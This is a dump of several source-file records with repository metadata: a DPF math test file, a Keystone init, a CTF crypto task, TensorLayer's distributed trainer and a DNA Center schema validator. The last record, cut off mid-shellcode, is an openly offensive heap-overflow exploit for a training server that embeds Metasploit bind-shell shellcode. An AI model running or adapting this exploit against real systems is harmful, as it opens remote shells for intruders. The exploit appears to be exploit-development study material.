assert np.allclose(out[0].data, np.array([[0.,0.,0.],[3.,3.,3.]]))
#fc - float
add = fc- 1.0
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[-1., 0., 1.],[2., 3., 4.]]))
def test_dot_operator_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field])
# fc * op
forward = ops.utility.forward_field(field)
add = fc*forward
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,50.]))
#fc * field
add = fc* field
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,50.]))
#fc * list
add = fc* [0.,1.,2.]
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,14.]))
#fc * float
add = fc* -1.0
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, -field.data)
def test_add_operator_server_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2,server=local_server)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field],server=local_server)
#operator with field out
forward = ops.utility.forward_field(field,server=local_server)
add = fc+forward
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array(field.data)*2.0)
#fc + list
add = fc+ [0.,1.,2.]
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,field.data + np.array([[0.,1.,2.],[0.,1.,2.]]))
#fc + float
add = fc+ 1.0
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[1., 2., 3.],[4., 5., 6.]]))
def test_minus_operator_server_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2,server=local_server)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field], server=local_server)
#operator with field out
forward = ops.utility.forward_field(field, server=local_server)
add = fc-forward
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.zeros((2,3)))
#fc - list
add = fc- [0.,1.,2.]
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[0.,0.,0.],[3.,3.,3.]]))
#fc - float
add = fc- 1.0
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[-1., 0., 1.],[2., 3., 4.]]))
def test_dot_operator_server_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2, server=local_server)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field], server=local_server)
# fc * op
forward = ops.utility.forward_field(field, server=local_server)
add = fc*forward
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,50.]))
#fc * field
add = fc* field
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,50.]))
#fc * list
add = fc* [0.,1.,2.]
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,14.]))
#fc * float
add = fc* -1.0
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, -field.data)
if __name__ == "__main__":
test_add_field_by_time_id()
| 33.665552
| 105
| 0.646185
|
fddc8d79e6a742b2b559bb9ca8edcc2325b22383
| 610
|
py
|
Python
|
keystone/credential/providers/fernet/__init__.py
|
ferag/keystone
|
af1c1a822a8dfdd543c6e4d48264f5b8be2bdfc7
|
[
"Apache-2.0"
] | 615
|
2015-01-07T12:32:52.000Z
|
2022-03-24T03:49:47.000Z
|
keystone/credential/providers/fernet/__init__.py
|
ferag/keystone
|
af1c1a822a8dfdd543c6e4d48264f5b8be2bdfc7
|
[
"Apache-2.0"
] | 11
|
2015-04-13T18:52:40.000Z
|
2021-08-21T06:13:05.000Z
|
keystone/credential/providers/fernet/__init__.py
|
ferag/keystone
|
af1c1a822a8dfdd543c6e4d48264f5b8be2bdfc7
|
[
"Apache-2.0"
] | 696
|
2015-01-15T00:31:07.000Z
|
2022-03-16T09:56:00.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystone.credential.providers.fernet.core import * # noqa
| 43.571429
| 75
| 0.765574
|
1166bfe06093ad6ba7cbd527909bbd8e5e1ec81e
| 716
|
py
|
Python
|
Gathered CTF writeups/ptr-yudai-writeups/2019/ISITDTU_CTF_2019_Quals/decrypt_to_me/task.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | 1
|
2022-03-27T06:00:41.000Z
|
2022-03-27T06:00:41.000Z
|
Gathered CTF writeups/ptr-yudai-writeups/2019/ISITDTU_CTF_2019_Quals/decrypt_to_me/task.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | null | null | null |
Gathered CTF writeups/ptr-yudai-writeups/2019/ISITDTU_CTF_2019_Quals/decrypt_to_me/task.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | 1
|
2022-03-27T06:01:42.000Z
|
2022-03-27T06:01:42.000Z
|
import binascii
def generate_prg_bit(n):
state = n
while True:
last_bit = state & 1
yield last_bit
middle_bit = state >> len(bin(n)[2:])//2 & 1
state = (state >> 1) | ((last_bit ^ middle_bit) << (len(bin(n)[2:])-1))
flag = '###########'
enc = "OKQI+f9R+tHEJJGcfko7Ahy2AuL9c8hgtYT2k9Ig0QyXUvsj1B9VIGUZVPAP2EVD8VmJBZbF9e17"
flag_bin_text = bin(int(binascii.hexlify(flag), 16))[2:]
prg = generate_prg_bit(len(flag_bin_text))
ctext = []
flag_bits = [int(i) for i in flag_bin_text]
for i in range(len(flag_bits)):
ctext.append(flag_bits[i] ^ next(prg))
ciphertext = '0b' + ''.join(map(str, ctext))
n = int(ciphertext, 2)
print binascii.unhexlify('%x' % n).encode('base64')
| 34.095238
| 84
| 0.645251
|
544aac87e697b5d888dd6a4cf7e9e633b1d66a5d
| 24,184
|
py
|
Python
|
tensorlayer/distributed.py
|
Windaway/tensorlayer
|
7afd8f0a39a4f1864a82e508f7a326fc998dc033
|
[
"Apache-2.0"
] | 1
|
2019-05-16T13:27:57.000Z
|
2019-05-16T13:27:57.000Z
|
tensorlayer/distributed.py
|
Helilysyt/tensorlayer
|
2dc4482a13aff3833a246b4d85b69a5d9079f01d
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/distributed.py
|
Helilysyt/tensorlayer
|
2dc4482a13aff3833a246b4d85b69a5d9079f01d
|
[
"Apache-2.0"
] | 1
|
2021-04-13T06:34:48.000Z
|
2021-04-13T06:34:48.000Z
|
# -*- coding: utf-8 -*-
import json
import os
import time
import tensorflow as tf
from tensorflow.python.training import session_run_hook
from tensorlayer import logging
from tensorlayer.decorators import deprecated
from tensorlayer.lazy_imports import LazyImport
hvd = LazyImport('horovod.tensorflow')
__all__ = ['TaskSpecDef', 'TaskSpec', 'DistributedSession', 'StopAtTimeHook', 'LoadCheckpoint', 'Trainer']
class Trainer(object):
"""Trainer for neural networks in a distributed environment.
TensorLayer Trainer is a high-level training interface built on top of TensorFlow MonitoredSession and
`Horovod <https://github.com/uber/horovod>`__. It transparently scales the training of a TensorLayer model
from a single GPU to multiple GPUs that be placed on different machines in a single cluster.
To run the trainer, you will need to install Horovod on your machine. Check the installation script at
`tensorlayer/scripts/download_and_install_openmpi3_ubuntu.sh`
The minimal inputs to the Trainer include (1) a training dataset defined using the TensorFlow DataSet API,
and (2) a model build function given the inputs of the training dataset, and returns the neural network
to train, the loss function to minimize, and the names of the tensor to log during training, and (3)
an optimizer and its arguments.
The default parameter choices of Trainer is inspired by the Facebook paper:
`Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour <https://arxiv.org/abs/1706.02677>`__
Parameters
----------
training_dataset : class TensorFlow ``DataSet``
The training dataset which zips samples and labels. The trainer automatically
shards the training dataset based on the number of GPUs.
build_training_func : function
A function that builds the training operator. It takes the training dataset as an input,
and returns the neural network, the loss function and a dictionary that maps
string tags to tensors to log during training.
optimizer : class TensorFlow ``Optimizer``
The loss function optimizer. The trainer automatically linearly scale the learning rate based on
the number of GPUs.
optimizer_args : dict
The optimizer argument dictionary. It must contain a `learning_rate` field in type of float.
Note that the learning rate is linearly scaled according to the number of GPU by default.
You can disable it using the option `scaling_learning_rate`
batch_size : int
The training mini-batch size (i.e., number of samples per batch).
prefetch_size: int or None
The dataset prefetch buffer size. Set this parameter to overlap the GPU training and data preparation
if the data preparation is heavy.
checkpoint_dir : None or str
The path to the TensorFlow model checkpoint. Note that only one trainer master would checkpoints its model.
If None, checkpoint is disabled.
log_step_size : int
The trainer logs training information every N mini-batches (i.e., step size).
validation_dataset: None or class TensorFlow ``DataSet``
The optional validation dataset that zips samples and labels. Note that
only the trainer master needs to the validation often.
build_validation_func: None or function
The function that builds the validation operator. It returns the validation neural network (which
share the weights of the training network) and a custom number of validation metrics.
scaling_learning_rate: Boolean
Linearly scale the learning rate by the number of GPUs. Default is True.
This `linear scaling rule` is generally effective and is highly recommended by the practioners.
Check `Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour <https://arxiv.org/abs/1706.02677>`__
max_iteration: int
The maximum iteration (i.e., mini-batch) to train.
The default is `math.inf`. You can set it to a small number to end the training earlier. This is
usually set for testing purpose.
Attributes
----------
training_network : class TensorLayer ``Layer``
The training model.
session : class TensorFlow ``MonitoredTrainingSession``
The training session tha the Trainer wraps.
global_step : int
The number of training mini-batch by far.
validation_metrics : list of tuples
The validation metrics that zips the validation metric property and the average value.
Examples
--------
See `tutorial_mnist_distributed_trainer.py
<https://github.com/tensorlayer/tensorlayer/blob/master/example/tutorial_mnist_distributed_trainer.py>`__.
"""
def __init__(
self, training_dataset, build_training_func, optimizer, optimizer_args, batch_size=32, prefetch_size=None,
checkpoint_dir=None, scaling_learning_rate=True, log_step_size=1, validation_dataset=None,
build_validation_func=None, max_iteration=float('inf')
):
# Initialize Horovod.
hvd.init()
self.is_master = hvd.rank() == 0
self._last_global_step = 0
if prefetch_size is None:
prefetch_size = batch_size
# Define the loss for validation dataset
if validation_dataset:
validation_dataset = validation_dataset.shard(num_shards=hvd.size(), index=hvd.rank()).batch(batch_size)
validation_dataset.prefetch(buffer_size=prefetch_size)
self._validation_iterator = validation_dataset.make_initializable_iterator()
next_example, next_label = self._validation_iterator.get_next()
_, self._validation_metrics = build_validation_func(next_example, next_label)
if not isinstance(self._validation_metrics, list):
self._validation_metrics = list(self._validation_metrics)
else:
self._validation_iterator = None
self._validation_metrics = None
# Get the shard of the dataset based on my local rank
training_dataset = training_dataset.shard(num_shards=hvd.size(), index=hvd.rank()).batch(batch_size)
training_dataset.prefetch(buffer_size=prefetch_size)
training_iterator = training_dataset.make_one_shot_iterator()
self._training_network, loss, log_tensors = build_training_func(*training_iterator.get_next())
# Adjust learning rate based on number of GPUs.
lr = optimizer_args['learning_rate']
optimizer_args['learning_rate'] = lr * hvd.size() if scaling_learning_rate else lr
opt = optimizer(**optimizer_args)
# Add Horovod Distributed Optimizer.
opt = hvd.DistributedOptimizer(opt)
self._global_step = tf.train.get_or_create_global_step()
if isinstance(log_tensors, list):
log_tensors.append(self._global_step)
else:
log_tensors['global_step'] = self._global_step
self._train_op = opt.minimize(loss, global_step=self._global_step)
hooks = [
# Horovod: BroadcastGlobalVariablesHook broadcasts initial variable states
# from rank 0 to all other processes. This is necessary to ensure consistent
# initialization of all workers when training is started with random weights
# or restored from a checkpoint.
hvd.BroadcastGlobalVariablesHook(0),
# Horovod: adjust number of steps based on number of GPUs.
tf.train.StopAtStepHook(last_step=max_iteration // hvd.size()),
tf.train.LoggingTensorHook(tensors=log_tensors, every_n_iter=log_step_size),
]
# Pin GPU to be used to process local rank (one GPU per process)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.visible_device_list = str(hvd.local_rank())
# Save checkpoints only on worker 0 to prevent other workers from
# corrupting them.
checkpoint_dir = checkpoint_dir if self.is_master else None
# The MonitoredTrainingSession takes care of session initialization,
# restoring from a checkpoint, saving to a checkpoint, and closing when done
# or an error occurs.
self._sess = tf.train.MonitoredTrainingSession(checkpoint_dir=checkpoint_dir, hooks=hooks, config=config)
@property
def global_step(self):
if self._sess.should_stop():
return self._last_global_step
self._last_global_step = self._sess.run(self._global_step)
return self._last_global_step
@property
def session(self):
return self._sess
@property
def training_network(self):
return self._training_network
@property
def validation_metrics(self):
"""A helper function to compute validation related metrics"""
if (self._validation_iterator is None) or (self._validation_metrics is None):
raise AttributeError('Validation is not setup.')
n = 0.0
metric_sums = [0.0] * len(self._validation_metrics)
self._sess.run(self._validation_iterator.initializer)
while True:
try:
metrics = self._sess.run(self._validation_metrics)
for i, m in enumerate(metrics):
metric_sums[i] += m
n += 1.0
except tf.errors.OutOfRangeError:
break
for i, m in enumerate(metric_sums):
metric_sums[i] = metric_sums[i] / n
return zip(self._validation_metrics, metric_sums)
def train_on_batch(self):
"""Train a mini-batch."""
self._sess.run(self._train_op)
def train_and_validate_to_end(self, validate_step_size=50):
"""A helper function that shows how to train and validate a model at the same time.
Parameters
----------
validate_step_size : int
Validate the training network every N steps.
"""
while not self._sess.should_stop():
self.train_on_batch() # Run a training step synchronously.
if self.global_step % validate_step_size == 0:
# logging.info("Average loss for validation dataset: %s" % self.get_validation_metrics())
log_str = 'step: %d, ' % self.global_step
for n, m in self.validation_metrics:
log_str += '%s: %f, ' % (n.name, m)
logging.info(log_str)
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
class TaskSpecDef(object):
"""Specification for a distributed task.
It contains the job name, index of the task,
the parameter servers and the worker servers. If you want to use the last worker
for continuous evaluation you can call the method `use_last_worker_as_evaluator`
which returns a new :class:`TaskSpecDef` object without the last worker in the
cluster specification.
Parameters
----------
task_type : str
Task type. One of `master`, `worker` or `ps`.
index : int
The zero-based index of the task. Distributed training jobs will have a single
master task, one or more parameter servers, and one or more workers.
trial : int
The identifier of the trial being run.
ps_hosts : str OR list of str
A string with a coma separate list of hosts for the parameter servers
or a list of hosts.
worker_hosts : str OR list of str
A string with a coma separate list of hosts for the worker servers
or a list of hosts.
master : str
A string with the master hosts
Notes
----------
master might not be included in TF_CONFIG and can be None. The shard_index is adjusted
in any case to assign 0 to master and >= 1 to workers.
This implementation doesn't support sparse arrays in the `TF_CONFIG` variable as the
official TensorFlow documentation shows, as it is not a supported by the json
definition.
References
----------
- `ML-engine trainer considerations <https://cloud.google.com/ml-engine/docs/trainer-considerations#use_tf_config>`__
"""
def __init__(self, task_type='master', index=0, trial=None, ps_hosts=None, worker_hosts=None, master=None):
self.type = task_type
self._index = int(index)
self._cluster_spec = None
self.num_workers = 1
self.num_ps = 0
self.shard_index = int(index)
self._master = True
self.trial = trial
self.ps_hosts = ps_hosts
self.worker_hosts = worker_hosts
self.master = master
self._server = None
if ps_hosts and worker_hosts:
self.ps_hosts = ps_hosts if isinstance(ps_hosts, list) else ps_hosts.split(',')
self.num_ps = len(self.ps_hosts)
self.worker_hosts = worker_hosts if isinstance(worker_hosts, list) else worker_hosts.split(',')
if master is not None and len(master) > 0:
self._cluster_spec = tf.train.ClusterSpec(
{
'ps': self.ps_hosts,
'worker': self.worker_hosts,
'master': master
}
)
# master is a worker too
self.num_workers = len(self.worker_hosts) + 1
if self.type == 'worker':
self.shard_index = self._index + 1
self._master = self.type == 'master'
else:
self._cluster_spec = tf.train.ClusterSpec({'ps': self.ps_hosts, 'worker': self.worker_hosts})
self.num_workers = len(self.worker_hosts)
if self.type == 'worker':
self.shard_index = self._index
self._master = self.type == 'worker' and self._index == 0
def is_ps(self):
"""Returns true if this server is a parameter server"""
return self.type == 'ps'
def is_worker(self):
"""Returns true if this server is a worker server"""
return self.type == 'worker'
def is_master(self):
"""Returns true if this server is the master server"""
return self._master
def is_evaluator(self):
"""Returns true if this server is the evaluator server"""
return self.type == 'worker' and self.num_workers == self._index
def device_fn(self):
"""Returns the function with the specification to create the graph in this server"""
current_device = '/job:{}/task:{}'.format(self.type, self._index)
ps_devices = '/job:ps'
return tf.train.replica_device_setter(
ps_device=ps_devices, worker_device=current_device, cluster=self._cluster_spec
)
def create_server(self):
if self._server is None and self.ps_hosts and self.worker_hosts and not self.is_evaluator():
# create server and join if it is a parameter server
self._server = tf.train.Server(self._cluster_spec, job_name=self.type, task_index=self._index)
if self.is_ps():
self._server.join()
def target(self):
if self._server is None:
self.create_server()
if self._server is not None:
return self._server.target
else:
return None
def use_last_worker_as_evaluator(self):
"""Returns a new :class:`TaskSpecDef` where the last worker has been removed from
the list of worker_hosts, so it is not used for training anymore. You can call
is_evaluator to know whether this server is the evaluator one or not.
In case there is only one server for training this method raises an exception, as
you cannot use any server for evaluation.
"""
if self.num_workers <= 1:
raise Exception('You need more than one worker instance to use one as evaluator')
return TaskSpecDef(
task_type=self.type, index=self._index, trial=self.trial, ps_hosts=self.ps_hosts,
worker_hosts=self.worker_hosts[:-1], master=self.master
)
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
def create_task_spec_def():
"""Returns the a :class:`TaskSpecDef` based on the environment variables for distributed training.
References
----------
- `ML-engine trainer considerations <https://cloud.google.com/ml-engine/docs/trainer-considerations#use_tf_config>`__
- `TensorPort Distributed Computing <https://www.tensorport.com/documentation/code-details/>`__
"""
if 'TF_CONFIG' in os.environ:
# TF_CONFIG is used in ML-engine
env = json.loads(os.environ.get('TF_CONFIG', '{}'))
task_data = env.get('task', None) or {'type': 'master', 'index': 0}
cluster_data = env.get('cluster', None) or {'ps': None, 'worker': None, 'master': None}
return TaskSpecDef(
task_type=task_data['type'], index=task_data['index'],
trial=task_data['trial'] if 'trial' in task_data else None, ps_hosts=cluster_data['ps'],
worker_hosts=cluster_data['worker'], master=cluster_data['master'] if 'master' in cluster_data else None
)
elif 'JOB_NAME' in os.environ:
# JOB_NAME, TASK_INDEX, PS_HOSTS, WORKER_HOSTS and MASTER_HOST are used in TensorPort
return TaskSpecDef(
task_type=os.environ['JOB_NAME'], index=os.environ['TASK_INDEX'], ps_hosts=os.environ.get('PS_HOSTS', None),
worker_hosts=os.environ.get('WORKER_HOSTS', None), master=os.environ.get('MASTER_HOST', None)
)
else:
raise Exception('You need to setup TF_CONFIG or JOB_NAME to define the task.')
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
def create_distributed_session(
task_spec=None, checkpoint_dir=None, scaffold=None, hooks=None, chief_only_hooks=None, save_checkpoint_secs=600,
save_summaries_steps=object(), save_summaries_secs=object(), config=None, stop_grace_period_secs=120,
log_step_count_steps=100
):
"""Creates a distributed session.
It calls `MonitoredTrainingSession` to create a :class:`MonitoredSession` for distributed training.
Parameters
----------
task_spec : :class:`TaskSpecDef`.
The task spec definition from create_task_spec_def()
checkpoint_dir : str.
Optional path to a directory where to restore variables.
scaffold : ``Scaffold``
A `Scaffold` used for gathering or building supportive ops.
If not specified, a default one is created. It's used to finalize the graph.
hooks : list of ``SessionRunHook`` objects.
Optional
chief_only_hooks : list of ``SessionRunHook`` objects.
Activate these hooks if `is_chief==True`, ignore otherwise.
save_checkpoint_secs : int
The frequency, in seconds, that a checkpoint is saved
using a default checkpoint saver. If `save_checkpoint_secs` is set to
`None`, then the default checkpoint saver isn't used.
save_summaries_steps : int
The frequency, in number of global steps, that the
summaries are written to disk using a default summary saver. If both
`save_summaries_steps` and `save_summaries_secs` are set to `None`, then
the default summary saver isn't used. Default 100.
save_summaries_secs : int
The frequency, in secs, that the summaries are written
to disk using a default summary saver. If both `save_summaries_steps` and
`save_summaries_secs` are set to `None`, then the default summary saver
isn't used. Default not enabled.
config : ``tf.ConfigProto``
an instance of `tf.ConfigProto` proto used to configure the session.
It's the `config` argument of constructor of `tf.Session`.
stop_grace_period_secs : int
Number of seconds given to threads to stop after
`close()` has been called.
log_step_count_steps : int
The frequency, in number of global steps, that the
global step/sec is logged.
Examples
--------
A simple example for distributed training where all the workers use the same dataset:
>>> task_spec = TaskSpec()
>>> with tf.device(task_spec.device_fn()):
>>> tensors = create_graph()
>>> with tl.DistributedSession(task_spec=task_spec,
... checkpoint_dir='/tmp/ckpt') as session:
>>> while not session.should_stop():
>>> session.run(tensors)
An example where the dataset is shared among the workers
(see https://www.tensorflow.org/programmers_guide/datasets):
>>> task_spec = TaskSpec()
>>> # dataset is a :class:`tf.data.Dataset` with the raw data
>>> dataset = create_dataset()
>>> if task_spec is not None:
>>> dataset = dataset.shard(task_spec.num_workers, task_spec.shard_index)
>>> # shuffle or apply a map function to the new sharded dataset, for example:
>>> dataset = dataset.shuffle(buffer_size=10000)
>>> dataset = dataset.batch(batch_size)
>>> dataset = dataset.repeat(num_epochs)
>>> # create the iterator for the dataset and the input tensor
>>> iterator = dataset.make_one_shot_iterator()
>>> next_element = iterator.get_next()
>>> with tf.device(task_spec.device_fn()):
>>> # next_element is the input for the graph
>>> tensors = create_graph(next_element)
>>> with tl.DistributedSession(task_spec=task_spec,
... checkpoint_dir='/tmp/ckpt') as session:
>>> while not session.should_stop():
>>> session.run(tensors)
References
----------
- `MonitoredTrainingSession <https://www.tensorflow.org/api_docs/python/tf/train/MonitoredTrainingSession>`__
"""
target = task_spec.target() if task_spec is not None else None
is_chief = task_spec.is_master() if task_spec is not None else True
return tf.train.MonitoredTrainingSession(
master=target, is_chief=is_chief, checkpoint_dir=checkpoint_dir, scaffold=scaffold,
save_checkpoint_secs=save_checkpoint_secs, save_summaries_steps=save_summaries_steps,
save_summaries_secs=save_summaries_secs, log_step_count_steps=log_step_count_steps,
stop_grace_period_secs=stop_grace_period_secs, config=config, hooks=hooks, chief_only_hooks=chief_only_hooks
)
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
class StopAtTimeHook(session_run_hook.SessionRunHook):
"""Hook that requests stop after a specified time.
Parameters
----------
time_running: int
Maximum time running in seconds
"""
def __init__(self, time_running):
self._time_running = time_running
self._end_time = 0
def begin(self):
self._end_time = time.time() + self._time_running
def after_run(self, run_context, run_values):
if time.time() > self._end_time:
run_context.request_stop()
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
class LoadCheckpoint(session_run_hook.SessionRunHook):
"""Hook that loads a checkpoint after the session is created.
>>> from tensorflow.python.ops import variables as tf_variables
>>> from tensorflow.python.training.monitored_session import SingularMonitoredSession
>>>
>>> tensors = create_graph()
>>> saver = tf.train.Saver(var_list=tf_variables.trainable_variables())
>>> checkpoint_hook = LoadCheckpoint(saver, my_checkpoint_file)
>>> with tf.SingularMonitoredSession(hooks=[checkpoint_hook]) as session:
>>> while not session.should_stop():
>>> session.run(tensors)
"""
def __init__(self, saver, checkpoint):
self._saver = saver
self._checkpoint = checkpoint
self._loaded = False
def after_create_session(self, session, coord):
if not self._loaded:
self._loaded = True
self._saver.restore(self._checkpoint)
# Alias
TaskSpec = create_task_spec_def
DistributedSession = create_distributed_session
| 44.29304
| 121
| 0.673627
|
39abf72ba31a0277445f4961c61a6ea6ec03244c
| 2,460
|
py
|
Python
|
tests/models/validators/v2_2_2_3/jsd_bd26b08b64545bae20f60c56891576.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 32
|
2019-09-05T05:16:56.000Z
|
2022-03-22T09:50:38.000Z
|
tests/models/validators/v2_2_2_3/jsd_bd26b08b64545bae20f60c56891576.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 35
|
2019-09-07T18:58:54.000Z
|
2022-03-24T19:29:36.000Z
|
tests/models/validators/v2_2_2_3/jsd_bd26b08b64545bae20f60c56891576.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 18
|
2019-09-09T11:07:21.000Z
|
2022-03-25T08:49:59.000Z
|
# -*- coding: utf-8 -*-
"""Cisco DNA Center DeletePortAssignmentForAccessPoint data model.
Copyright (c) 2019-2021 Cisco Systems.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import fastjsonschema
import json
from dnacentersdk.exceptions import MalformedRequest
from builtins import *
class JSONSchemaValidatorBd26B08B64545BAe20F60C56891576(object):
"""DeletePortAssignmentForAccessPoint request schema definition."""
def __init__(self):
super(JSONSchemaValidatorBd26B08B64545BAe20F60C56891576, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"description":
{
"type": "string"
},
"executionStatusUrl": {
"type": "string"
},
"status": {
"type": "string"
}
},
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
| 35.142857
| 81
| 0.658537
|
775170709fe2da34703e3631758c9532cd68ccdb
| 2,962
|
py
|
Python
|
heap_overflows_for_humans/serve_heap/serve_heap_exploit.py
|
iphelix/exploits
|
1c72773149a2876c9f0fe9d37af8712b3d7c72b9
|
[
"Apache-2.0"
] | 5
|
2018-11-23T07:56:54.000Z
|
2021-11-17T17:50:19.000Z
|
heap_overflows_for_humans/serve_heap/serve_heap_exploit.py
|
iphelix/exploits
|
1c72773149a2876c9f0fe9d37af8712b3d7c72b9
|
[
"Apache-2.0"
] | null | null | null |
heap_overflows_for_humans/serve_heap/serve_heap_exploit.py
|
iphelix/exploits
|
1c72773149a2876c9f0fe9d37af8712b3d7c72b9
|
[
"Apache-2.0"
] | 2
|
2021-02-26T22:54:47.000Z
|
2021-11-17T17:50:21.000Z
|
#!/usr/bin/env python
#
# serve_heap heap overflow exploit
# by iphelix
#
# Tested on Windows XP SP3 with DEP set to AlwaysOn
import sys, socket
from struct import pack
from binascii import hexlify
HOST = sys.argv[1]
PORT = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
target = pack("I",0x004061b0) # 0x004061b0 - memcpy
scaddr = pack("I",0x004926b0) # shellcode address
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
# BADCHARS='\x00\x20'
shellcode = (
"\xba\x3b\xaf\x2d\xf2\xda\xd9\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x56\x31\x56\x13\x03\x56\x13\x83\xee\xc7\x4d\xd8\x0e\xdf\x1b"
"\x23\xef\x1f\x7c\xad\x0a\x2e\xae\xc9\x5f\x02\x7e\x99\x32\xae"
"\xf5\xcf\xa6\x25\x7b\xd8\xc9\x8e\x36\x3e\xe7\x0f\xf7\xfe\xab"
"\xd3\x99\x82\xb1\x07\x7a\xba\x79\x5a\x7b\xfb\x64\x94\x29\x54"
"\xe2\x06\xde\xd1\xb6\x9a\xdf\x35\xbd\xa2\xa7\x30\x02\x56\x12"
